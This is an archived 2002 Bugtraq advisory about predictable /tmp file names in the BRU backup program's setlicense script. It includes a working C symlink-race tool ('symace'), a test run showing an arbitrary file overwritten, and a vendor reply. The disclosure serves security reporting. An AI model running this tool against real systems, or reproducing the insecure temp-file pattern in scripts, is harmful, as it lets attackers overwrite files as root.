Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

bru backup program

From: "Andrew Griffiths" <andrewg () tasmail com>
Date: Sat, 26 Jan 2002 21:00:55 +1100 (EST)
Product: Bru 

Description:
------------

BRU provides fully verified backup and restore operations and offers options 
for most conceivable data backup and  recovery  needs.  BRU is fully device 
independent, so it works with any device or filesystem that  is  supported by 
your operating system.  Verification is performed automatically with BRU's 
Autoscan feature and can also be performed  days,  weeks, or even years after 
a backup is performed.

[ As taken from bru.1 man page ]

Problem:
--------

The usage of insecure tmp files in some of the various shell scripts, which allows
you to overwrite arbitrary files with foobar. Since this script would most 
likely be run by root, it allows you to overwrite any files you want.

Exploit:
--------

This is the beginnings of the setlicense shell script. For those who don't know,
$$ is the current pid of the shell.

#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
        alias printf="echo -n -e"
fi

So all that needs to be done is create a fair amount of symbolic links in the
temp directory pointing to the file you want to overwrite.

---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr () tasmail com)    */

int main(int argc, char **argv)
{
        char *overwrite;
        char *base;
        int start_pid, end_pid;
        int i, size;

        overwrite = strdup(argv[1]);
        size = strlen(argv[2]) + 8 + 1;
        base = malloc(size);
        start_pid=atoi(argv[3]);
        end_pid=atoi(argv[4]);

        for(i=start_pid;i<end_pid;i++) {
                memset(base, 0, size-1);
                snprintf(base, size-1, "%s%d", argv[2], i);
                if(symlink(overwrite, base)==-1) {
                        printf("Unable to create %s bailing\n", base);
                        exit(EXIT_FAILURE);
                }
        }
        printf("done\n");
}

Vendor Respone:
---------------

This doesn't make much sense to me, exploiting your own system while you are already root? Correct me if I am wrong but 
this doesn't make much sense to me. 

--Mike
BRU Support Team 
The TOLIS Group - http://www.tolisgroup.com 
support () tolisgroup com 

I think he didn't like my example down there. Everyone else on the list should be able to understand it without the 
need for a # sign...


Test Run:
---------

[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done

On another terminal:

[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist.  BRU may not be installed.

Then back to the other one...

[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$




--
www.tasmail.com
Previous By Date Next
Previous By Thread Next

Current thread: